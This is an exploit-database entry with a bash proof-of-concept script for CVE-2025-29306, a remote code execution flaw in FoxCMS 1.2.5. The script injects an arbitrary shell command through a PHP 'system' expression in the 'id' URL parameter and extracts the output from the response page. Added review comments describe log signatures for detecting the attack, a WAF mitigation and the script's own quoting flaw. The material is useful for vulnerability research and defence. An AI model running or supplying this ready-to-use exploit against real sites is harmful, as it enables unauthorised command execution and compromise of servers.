FoxCMS 1.2.5 - Remote Code Execution (RCE)

Author: VeryLazyTech
type: webapps
platform: multiple
port: 
date_added: 2025-04-19  
date_updated: 2025-04-19  
verified: 0  
codes: CVE-2025-29306  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 52267.bash  
# Date: 2025-04-17
# Exploit Title: FoxCMS 1.2.5 - Remote Code Execution (RCE)
# Exploit Author: VeryLazyTech
# Vendor Homepage: https://www.foxcms.org/
# Software Link: https://www.foxcms.cn/
# Version: FoxCMS v.1.2.5
# Tested on: Ubuntu 22.04, Windows Server 2019
# CVE: CVE-2025-29306
# Website: https://www.verylazytech.com

#!/bin/bash

# Print the author's ASCII-art banner to stdout.
# Arguments: none
# Outputs:   the banner text, verbatim
# The heredoc delimiter is quoted ('EOF'), so the backticks, quotes and
# backslashes in the art are emitted literally; nothing inside is expanded
# or executed by the shell.
banner() {
cat <<'EOF'
  ______     _______   ____   ___ ____  ____    ____   ___ _____  ___   __
 / ___\ \   / / ____| |___ \ / _ \___ \| ___|  |___ \ / _ \___ / / _ \ / /_
| |    \ \ / /|  _|     __) | | | |__) |___ \    __) | (_) ||_ \| | | | '_ \
| |___  \ V / | |___   / __/| |_| / __/ ___) |  / __/ \__, |__) | |_| | (_) |
 \____|  \_/  |_____| |_____|\___/_____|____/  |_____|  /_/____/ \___/ \___/

__     __                _                      _____         _
\ \   / /__ _ __ _   _  | |    __ _ _____   _  |_   _|__  ___| |__
 \ \ / / _ \ '__| | | | | |   / _` |_  / | | |   | |/ _ \/ __| '_ \
  \ V /  __/ |  | |_| | | |__| (_| |/ /| |_| |   | |  __/ (__| | | |
   \_/ \___|_|   \__, | |_____\__,_/___|\__, |   |_|\___|\___|_| |_|
                 |___/                  |___/


                    @VeryLazyTech - Medium

EOF

}

# Print the banner before anything else runs.
banner

# Abort on the first failing command.
# NOTE(review): this also applies to the command-substitution assignments
# below, so a failed python3, curl or xmllint ends the script before any
# result line is printed.
set -e

# Require exactly two arguments: the target URL and the command string.
# NOTE(review): $0 is expanded inside the printf format string and the
# message has no trailing newline.
if [ "$#" -ne 2 ]; then
    printf "Usage: $0 <url> <command>"
    exit 1
fi

TARGET=$1

# Build the query-string value: the second argument is wrapped in the PHP
# expression ${@print_r(@system("..."))} and percent-encoded with
# urllib.parse.quote, then appended to the target URL as the `id` parameter.
# NOTE(review): $2 is pasted unescaped into the Python source text, so a
# quote or backslash in it changes the code python3 executes on the local
# machine. Treat the argument as trusted-operator input only and run this
# in an isolated lab environment.
# Detection: because quote() percent-encodes `$`, `{`, `@`, `(` and `"`, the
# request appears in web/WAF logs as a GET whose `id` value starts with
#   %24%7B%40print_r%28%40system%28%22
# Searching access logs for that prefix, or for `${` / `system(` in a
# decoded `id` parameter, identifies use of this PoC as written.
# Mitigation: the page lists FoxCMS v1.2.5 as affected and names no fixed
# release; confirm a patched version with the vendor, and until then block
# `id` values containing `${` or PHP function-call syntax at the proxy/WAF.
ENCODED_CMD=$(python3 -c "import urllib.parse; print(urllib.parse.quote('\${@print_r(@system(\"$2\"))}'))")
FULL_URL="${TARGET}?id=${ENCODED_CMD}"

# Single unauthenticated GET; -s suppresses curl's progress and error output.
# No timeout or HTTP status check is performed.
echo "[*] Sending RCE payload: $2"
HTML=$(curl -s "$FULL_URL")

# Extract <ul> from known XPath location using xmllint.
# The XPath is hard-coded, so it only matches pages that use this exact
# header layout, and xmllint's diagnostics are discarded by 2>/dev/null.
# NOTE(review): xmllint normally exits non-zero when the XPath selects
# nothing, which under `set -e` would end the script here with no message.
# An empty or missing result therefore does not show that a host is patched;
# verify remediation from the installed version and server logs instead.
UL_CONTENT=$(echo "$HTML" | xmllint --html --xpath "/html/body/header/div[1]/div[2]/div[1]/ul" - 2>/dev/null)

# Strip tags, clean up: remove anything that looks like an HTML tag, drop
# empty lines, then trim leading whitespace from each remaining line.
CLEANED=$(echo "$UL_CONTENT" | sed 's/<[^>]*>//g' | sed '/^$/d' | sed 's/^[[:space:]]*//')

# Print whatever text remained inside the extracted <ul>.
echo
echo "[+] Command Output:"
echo "$CLEANED"